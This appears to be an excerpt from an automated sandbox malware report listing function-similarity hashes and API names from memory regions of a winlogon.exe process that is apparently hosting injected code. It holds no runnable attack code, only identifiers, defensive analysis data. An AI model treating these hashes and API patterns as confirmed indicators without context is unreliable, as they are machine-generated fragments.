• Instruction ID: f31aed1ed36a3af1d3ce0fc3e67529aff71f3cc58c932523fe09cda7a5d9a8e8
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: F8D19D73A407888AFB62DB65E540BDD7BA0FB8578EF800105EE8957B95DB36C481C783

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: ca0dda4068cd8d0100fe43f739cbc5f9adb731b21175f4b4e172cd38bb13ad7a
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: 69D18A73A40B488AFB629B65D580BDD77A0FB49B8CF800105EE8D57B96DB76C481C783

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction ID: 31f0a2f5ea800dff5abde378d94a8cd71f19c1ee93edadf03dca32ece7988c86
• Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction Fuzzy Hash: 2A41D233B91B0852FA17CB56A804FD53391BFC9BE9FC94125DD099B784EA3AC4458383

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: 0332acd1771d854494ee12fb43ad52b5304bce5d0e0612f73963db57a60a753a
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 2741A1B3614B88C6F761CF21E444B9E77A1F788B89F448129DA8947758DF39C485CB42

APIs
• FlsGetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED5F7
• FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED616
• FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED63E
• FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED64F
• FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED660
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction ID: c227e7830e1f9c1d10eb2069a500807f369b07f3f1191aeb5736f632a5f76b06
• Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction Fuzzy Hash: 48114F72F8434881FA5B57226551BE971427F487EAFDC8324693D466D6EE2AC40243C3

APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: d61144fdfba89683a24292356ce87fc7abb84e217eee572a164a7874b7477b9c
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 0481A133F8034D46FA53AB65A441FD97690BF85B8EFD44015AA8847396EB3AC846C7C3

APIs
Memory Dump Source
• Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: 48fcc366b1401c45def13d2372391de8a34e7c7d4babd9e2966067a0c4afb970
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 6E81D433F8430C8AFA52AB25A451BE93690FFA578CFD49015DA4C5B796DB3BC8418783

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction ID: 7c5023be7fac9642ddbe2c1919178884c2059021b75bd1e11dad0deec76e08b7
• Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction Fuzzy Hash: 5A31CD33A82709A1FE539B82E900BD43394BF45BA9F990624DD1E1B390DF3BC4488383

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: 8cd734ec53eb78cc3d0a3b69bc30624e61f32c92dd456ae9b483cf1a75deebc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B111B632B54B5883F3528B52F844B9972A0FB88FE8F940224EE5A87794DF39C404C787
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\winlogon.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-3603389050
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 4ccaf887a55ef58bd9d03d6c91a2764e157fb7b8694f785958393da1e073500b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E33180F798EBC88AF352CB7598556893BA0FBC5F48F898015DA4403347DA26D404C783
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: bffa12124b6869ef26d18b49398ff8f6b3a0fec7e1b25ada04cfb4b0cc7ceba9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD118C32B8834882FA17A3216551BE932627F447FEFDC4724A936477D6EE6AC40183C3
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: 576a392f1f9a9d95cfcc6bc41593a475a6a70078ac4ae8bda41fbae5dd04e06d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8015B32B45B8886FA11DB52A458B9973A1FB88FC9F884034DE4D43754DF3DC989C782
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: f8fd27e83b1b72d7f2ce0b504b08d324a200ef1283ed7fae9fb318232fc037c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7012176F5274882FB269B51E818B9A72A0FF55F8AF940125C94907754EF3FC4088783
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 9b292f6370f99936f14c50318c372ff85e96ef2d1b34f4f60cf33b36db74d0c7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F0AF3374478892FB218B61F894FA97760FB88B8CFC44020CA4942954DF7EC688CB42
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 2955cdbca312dcd7e5497ff0c8f4b5f7647af41f3e71c17895f5000dcf043701
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F06273A5270981FB118B64E844B997321FF85BA9FD40219D56A452E4DF2EC044C383
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction ID: 39fc8da7d399a26a4e90035f22321ef295c07e493129d72101e3cc8db3def2e9
• Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction Fuzzy Hash: 68F0A732B55B8881FA058B53B9145997661FF48FD9F888130EE4E07B18CF3DC4868783
APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 2f21f1b7d680375770059ee47be5c824cdfe53a9a9059a6bad666dfd6aad0ae5
• Instruction ID: 765e8dafc42f728ce51463b2db5c40a7feb60042766906d02ca29a17f2e0185e
• Opcode Fuzzy Hash: 2f21f1b7d680375770059ee47be5c824cdfe53a9a9059a6bad666dfd6aad0ae5
• Instruction Fuzzy Hash: 2761FE37A59B48C7F7618B15E450B9AB7A0F788749F900115FA8D83BA4DB7DC540CF82
APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 9956e04d655451dc383e316b6ba75e8c80b983be334d5368c0dfb43c842b6769
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: E011A337ED2B0801F6671168D451FE530517F697BCFC40634BAA7066E6DA26C84243C3
APIs
Memory Dump Source
• Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 79dc0acdce94d256c5547a56f3948224d3601e2aafc90a66b494a27cd80d70a1
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: 7B11E737ED4B0801F6672368E847BE930417F5937CFC80230E56E862EADA66C8D18383
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction ID: 24e0dd9f68721c0c3ca3bd256542bd7075973f55fb31fd1ab5f329473c69f4c1
• Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction Fuzzy Hash: 3351B033B517988AFB56CF15E444FA87391FB84B8DF908120EA4647B88DB7AC841C782
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction ID: 1d53925dee3c56d575b373dcbf28b9f574cc5d092cd1563c64954f41c80b0141
• Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction Fuzzy Hash: D061D173904BC881EB72CF15E540BDABBA0FB85B99F444315EB9843B99CB39D194CB42
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction ID: 29bcbea5cc99e7f74d36aef28903cfe833e39e28afdb39bb5195de18103c7c4e
• Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction Fuzzy Hash: ED51AF3394038886FB76CF159644B987BA0FB54B8EF984225DA8947BD6CB39C490C783
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction ID: 2bc3c3612cf833e2ad1c42e4024421941b8798db06fb65acfb60d4d2ae146d4e
• Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction Fuzzy Hash: C551CE33A4478886FB768F21D244B9877A0FB44B9CF988116DA8C47BD5CB7AC491C783
APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
• Instruction ID: 68331d0cdc66f6aa2e6d68a4811fc7f5493641d68d7da1d3c5fee51653f086a3
• Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
• Instruction Fuzzy Hash: 02319F33B41B5982FA16CF56E940BA9B7A0BF44B89F884024DF4847B55EF36C4A18382
APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: efef8ab2af5f90e34553b15d8f5b71952d393e6803cdbd5662c74e2bffbdfca9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD1DF33B06B8889F722CFA5D440AEC37A1FB4479CF944255CE5DA7B99DA35C406C782
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: dbe08f10fb5c2e532c7d3d17c5dfa145707cd442be3c723c69fc0ca6ecbec5da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9691EE73F5575885F7629F659480BED7BA0FB41B8CF94410ADE0A67A84DB36C482C383
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 40f1ba51dad96662f11ac96ad467e4748dff922b32281caad37b3518e4389204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B115E32B55F048AFB01CF60E8557E833A4FB5975CF840E21EE6D827A4EB38C1598382
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: c0cb3b23a291a5e1c18388a5c5224d77e2cba80131e91876240bdf4a69042d32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5271E737A4078981F776DF25D864BEA7794FB5878AFC1011EED0A43789DA36C9048783
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: d18c1629867c212125edc142be5d28f2604b491033924c58c9a4cba8a7ca871d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B51E033B557088AFB55CF29E044FA87791FB40B9CF948124EA8E47788D73AC941CB82
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
